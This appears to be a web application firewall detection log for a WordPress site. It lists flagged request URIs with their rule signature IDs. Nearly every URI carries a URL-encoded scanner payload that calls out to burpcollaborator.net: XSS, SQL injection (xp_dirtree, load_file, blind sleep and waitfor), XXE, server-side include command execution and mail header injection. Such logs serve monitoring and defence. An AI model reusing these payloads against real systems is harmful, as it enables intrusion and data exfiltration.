Packet [411]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fim8auuj78plcp4r50hv71fx1rsxqln9f03uqke9X%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [412]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fzuxr2brog6ttxlzm8y3o9w5iz957t4hw8k27svhX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [414]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2f042scc1pq73u7m9nizdpjxfj9af835rxil98zwoX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e]	Nattacks [18 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]	[942460]
Packet [416]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver='%22%3e%3csvg%2fonload%3dfetch%60%2f%2fwsso08ple3rqvixj6v1l7t3fx634rzfr5fw2mqb%5c.burpcollaborator.net%60%3e]	Nattacks [7 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]	[942460]
Packet [418]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&%22--%3e'--%3e%60--%3e%3c!--%23set%20var%3d%227jd%22%20value%3d%226icyqifv4d%22--%3e%3c!--%23set%20var%3d%229lf%22%20value%3d%228ke0skhx6f%22--%3e%3c!--%23echo%20var%3d%227jd%22--%3e%3c!--%23echo%20var%3d%229lf%22--%3e%3c!--%23exec%20cmd%3d%22nslookup%20-q%3dcname%20t5zld52ir04n8fagjseikqgca3g14wsoqckzanz.burpcollaborator.net%22%20--%3e=1]	Nattacks [9 ]	Signatures	[941160]	[941180]	[942110]	[942260]	[942300]	[942370]	[942430]	[942440]	[942431]
Packet [419]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fbcr3kn90yib5fxhyqal0r8nuhlnjbez6pujh95y%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [420]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&'%22%3e%3csvg%2fonload%3dfetch%60%2f%2flxmd5xuajswf0728bk6aci842v8twokga44rufj%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [421]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&(function()%7bif(typeof%20ek85z%3d%3d%3d'undefined')%7bvar%20a%3dnew%20Date()%3bdo%7bvar%20b%3dnew%20Date()%3b%7dwhile(b-a%3c20000)%3bek85z%3d1%3b%7d%7d())=1]	Nattacks [9 ]	Signatures	[932140]	[933161]	[934100]	[942130]	[942150]	[942410]	[942430]	[942431]	[942511]
Packet [422]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20pbwmv%20SYSTEM%20%22http%3a%2f%2fccs4ko91yjb6fyhzqbl1r9nvhmnkbfzinca2yr.burpcollab'%7c%7c'orator.net%2f%22%3e%25pbwmv%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [423]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&(select%20load_file('%5c%5c%5c%5czorrwbloa6ntrltm2yxo3wzit9z7n2btdh74xsm.burpcollaborator.net%5c%5ckoj'))=1]	Nattacks [6 ]	Signatures	[942360]	[942150]	[942260]	[942310]	[942410]	[942431]
Packet [424]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&(select*from(select(sleep(20)))a)=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [425]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%0d%0aBCC%3antkf1zqcfushw9ya7m2c8k46yx4vsqgi963tthi@burpcollaborator.net%0d%0axhc%3a%20r=1]	Nattacks [2 ]	Signatures	[920272]	[921150]
Packet [426]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%20and%20(select*from(select(sleep(20)))a)--%20=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942150]	[942200]	[942410]	[942440]	[942431]
Packet [427]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%20and%203181%3d03181=1]	Nattacks [1 ]	Signatures	[942400]
Packet [428]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%20and%205565%3d05565--%20=1]	Nattacks [2 ]	Signatures	[942400]	[942440]
Packet [429]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%20and%205676%3d5677=1]	Nattacks [1 ]	Signatures	[942400]
Packet [430]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%20and%209225%3d9228--%20=1]	Nattacks [2 ]	Signatures	[942400]	[942440]
Packet [431]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%20into%20outfile%20'%5c%5c%5c%5cen56vqk39lm8q0s11dw32byxsoymmha8ew8jy7n.burpcollaborator.net%5c%5cxcs'%3b%20--%20=1]	Nattacks [5 ]	Signatures	[942190]	[942260]	[942370]	[942480]	[942440]
Packet [432]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%20waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [5 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]
Packet [433]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%25%7dgax7v'%2f%22%3cut26m=1]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [434]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%2b(select*from(select(sleep(20)))a)%2b=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [435]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%2c0)waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [6 ]	Signatures	[942280]	[942200]	[942300]	[942440]	[942490]	[942431]
Packet [436]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c255ude2rr94w8oapj1erkzglacga45swikc72vr.burpcollab'%2b'orator.net%5cbvc'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [437]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1%3e%0d%0aBCC%3a8nw0vkkx9fm2qusv17wx25yrsiygmba34ryeo2d@burpcollaborator.net%0d%0afpw%3a%20t=1]	Nattacks [3 ]	Signatures	[920272]	[921150]	[942130]
Packet [439]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1'%2b(function()%7bif(typeof%20ee4a6%3d%3d%3d%22undefined%22)%7bvar%20a%3dnew%20Date()%3bdo%7bvar%20b%3dnew%20Date()%3b%7dwhile(b-a%3c20000)%3bee4a6%3d1%3b%7d%7d())%2b'=1]	Nattacks [11 ]	Signatures	[932140]	[933161]	[934100]	[934100]	[942110]	[942130]	[942130]	[942150]	[942410]	[942430]	[942431]
Packet [440]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1'%2b(select%20load_file('%5c%5c%5c%5cexf65qu3jlw80021bd63cb8x2o8mwhk8nwhj77w.burpcollaborator.net%5c%5chga'))%2b'=1]	Nattacks [9 ]	Signatures	[942360]	[942110]	[942150]	[942260]	[942310]	[942370]	[942410]	[942431]	[942511]
Packet [441]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cvxwn57ukj2wp0h2ibu6kcs8e2583wykpbd50vok.burpcollab'%2b'orator.net%5cryv'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [442]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20pbwmv%20SYSTEM%20%22http%3a%2f%2feq86yqn3clp8t0v14dz35b1xvo1mphdl1fo5cu.burpcollab'%7c%7c'orator.net%2f%22%3e%25pbwmv%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [19 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [443]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1')%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c1motudjq88lvpnro00vq1yxkrbx9l49v2jw6mub.burpcollab'%2b'orator.net%5cxuw'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [444]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1'=1]	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [445]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5csuqk24rhgztmxezf8r3h9p5bz250tvhm9a3xtli.burpcollab'%2b'orator.net%5ctvr'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [446]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1)waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [5 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]
Packet [447]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&128469066'%20or%20'6000'%3d'6004=1]	Nattacks [7 ]	Signatures	[942180]	[942330]	[942340]	[942370]	[942390]	[942490]	[942511]
Packet [448]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&130734486%20or%205215%3d5220--%20=1]	Nattacks [2 ]	Signatures	[942390]	[942440]
Packet [449]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&138625287%20or%206797%3d06797=1]	Nattacks [1 ]	Signatures	[942390]
Packet [450]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&168005320'%20or%204436%3d4441--%20=1]	Nattacks [4 ]	Signatures	[942180]	[942330]	[942390]	[942440]
Packet [451]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&168426972'%20or%206409%3d6409--%20=1]	Nattacks [5 ]	Signatures	[942130]	[942180]	[942330]	[942390]	[942440]
Packet [452]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&173997744%20or%202516%3d02516--%20=1]	Nattacks [2 ]	Signatures	[942390]	[942440]
Packet [453]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&177494697'%20or%20'3875'%3d'3875=1]	Nattacks [8 ]	Signatures	[942130]	[942180]	[942330]	[942340]	[942370]	[942390]	[942490]	[942511]
Packet [454]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&183503652%20or%209018%3d9019=1]	Nattacks [1 ]	Signatures	[942390]
Packet [455]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&1zcaa7%25%3ecq9ws'%2f%22%3curt46=1]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942370]
Packet [457]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fa8j2gm5zuh74bwdxm9hzn7jtdkji7dv5mtgg64vX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [458]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba&javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fn0of8zxcmuzh395aem9cfkb65xbvzqnie68tyhnX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [462]	Uri [/web/wp-includes/blocks/navigation/view.min.js?ver=javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fgey8msb50ndah2j3sfn5tdpzjqpodj1bszjm9ayX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e]	Nattacks [18 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]	[942460]
Packet [469]	Uri [/web/xmlrpc.php?rsd%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5ch2k9atz6oo1b5374ggb6hed07rdp1opff36qwel.burpcollab'%2b'orator.net%5cztm'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [471]	Uri [/web/xmlrpc.php?rsd&(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20jkczp%20SYSTEM%20%22http%3a%2f%2fz00r8bxom6zt3l5mey9ofwbi59b7z6n9b3ytmi.burpcollab'%7c%7c'orator.net%2f%22%3e%25jkczp%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [472]	Uri [/web/xmlrpc.php?rsd&(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20vufyc%20SYSTEM%20%22http%3a%2f%2ffgz7ord42mf9j1l2uep4vcrylprnfm3prje92y.burpcollab'%7c%7c'orator.net%2f%22%3e%25vufyc%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [473]	Uri [/web/xmlrpc.php?rsd&1%25%7da3t4y'%2f%22%3clm3d6=1]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [474]	Uri [/web/xmlrpc.php?rsd&1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cjczbkv98yqbdf5h6qil8rgn2htnrbqzhp5js9gy.burpcollab'%2b'orator.net%5cofc'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [476]	Uri [/web/xmlrpc.php?rsd&1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20jkczp%20SYSTEM%20%22http%3a%2f%2fy10q9aynn50s4k6lfxangvch68c605o9c3ztni.burpcollab'%7c%7c'orator.net%2f%22%3e%25jkczp%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [19 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [479]	Uri [/web/xmlrpc.php?rsd'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20grxmn%20SYSTEM%20%22http%3a%2f%2flj8drxga5sifm7o8xksayiu4ovutis6wunhd52.burpcollab'%7c%7c'orator.net%2f%22%3e%25grxmn%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c']	Nattacks [18 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [480]	Uri [/web/xmlrpc.php?rsd(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20grxmn%20SYSTEM%20%22http%3a%2f%2fdvc53ps2hku7yz009c42aa6w0n6lukin6et4ht.burpcollab'%7c%7c'orator.net%2f%22%3e%25grxmn%3b]%3e')%2c'%2fl')%20from%20dual)]	Nattacks [16 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [481]	Uri [/web/xmlrpc.php?rsd(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20lbqez%20SYSTEM%20%22http%3a%2f%2fomegu0jd8vliparb0nvd1lx7ryxwlv9yxpkf84.burpcollab'%7c%7c'orator.net%2f%22%3e%25lbqez%3b]%3e')%2c'%2fl')%20from%20dual)]	Nattacks [16 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [485]	Uri [/web?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2f9w614ltyigv3zv1wa85yb67s1j7fv5jx9l38twi%5c.burpcollaborator.net%60%3e=1]	Nattacks [7 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942490]	[942431]
Packet [486]	Uri [/web?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fmtje1yqbftsgw8y97l2b8j45yw4tsjgb6z0mqaf%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [487]	Uri [/web?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fvponx7mkb2opshui3uyk4s0eu503ovcn2bwymmb%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [488]	Uri [/web?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20cxlbn%20SYSTEM%20%22http%3a%2f%2fybdqja8nx5asekglpxknqvmhg8m6ayy1mv9lxa.burpcollab'%7c%7c'orator.net%2f%22%3e%25cxlbn%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [489]	Uri [/web?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20dkjip%20SYSTEM%20%22http%3a%2f%2f0nosvckp97muqmsn1zwp2xyjsay6mwazytlj98.burpcollab'%7c%7c'orator.net%2f%22%3e%25dkjip%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [490]	Uri [/web?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20pbill%20SYSTEM%20%22http%3a%2f%2fnlcftzic7ukho9qazmuc0kw6qxwtkj8mwgj67v.burpcollab'%7c%7c'orator.net%2f%22%3e%25pbill%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [491]	Uri [/web?(select%20load_file('%5c%5c%5c%5cdr85zpo2dkq7uzw05c026a2wwn2jq9e0goab0zp.burpcollaborator.net%5c%5ctyr'))=1]	Nattacks [6 ]	Signatures	[942360]	[942150]	[942260]	[942310]	[942410]	[942431]
Packet [493]	Uri [/web?1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c3bfvjf8sxaaxepgqp2ksq0mmgdm9azyqoei18px.burpcollab'%2b'orator.net%5clnk'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [494]	Uri [/web?1'%2b(select%20load_file('%5c%5c%5c%5cm3qeby0bpt2g6889hlcbije58wes2iq9txnkd82.burpcollaborator.net%5c%5cldx'))%2b'=1]	Nattacks [9 ]	Signatures	[942360]	[942110]	[942150]	[942260]	[942310]	[942370]	[942410]	[942431]	[942511]
Packet [495]	Uri [/web?1'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cvutn27rkg2tpxhzi8u3k9s5ez551trhi862tshh.burpcollab'%2b'orator.net%5csap'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [496]	Uri [/web?1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20dkjip%20SYSTEM%20%22http%3a%2f%2fl0md8xxamszf3758ek9afib45vbrzhnlbfy5mu.burpcollab'%7c%7c'orator.net%2f%22%3e%25dkjip%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [19 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [497]	Uri [/web?1')%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cho99wtl6aonbr3t42gx63ez0trznndb44syfo3d.burpcollab'%2b'orator.net%5cdnj'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [498]	Uri [/web?1)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c6ryyziovddq0uswt550v632pwg2cq2et6h04qsf.burpcollab'%2b'orator.net%5cngp'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [503]	Uri [/web?b2bui%7b%7b221*967%7d%7dy3xbu=1]	Nattacks [1 ]	Signatures	[941380]
Packet [505]	Uri [/web?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2f5tzx1hqufcszwrys742u824oyf4ds5gx7l18rwgX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [506]	Uri [/web?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fyfhqnacn15esikkltxonuvqhk8q4eu2mtanxdl2X%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
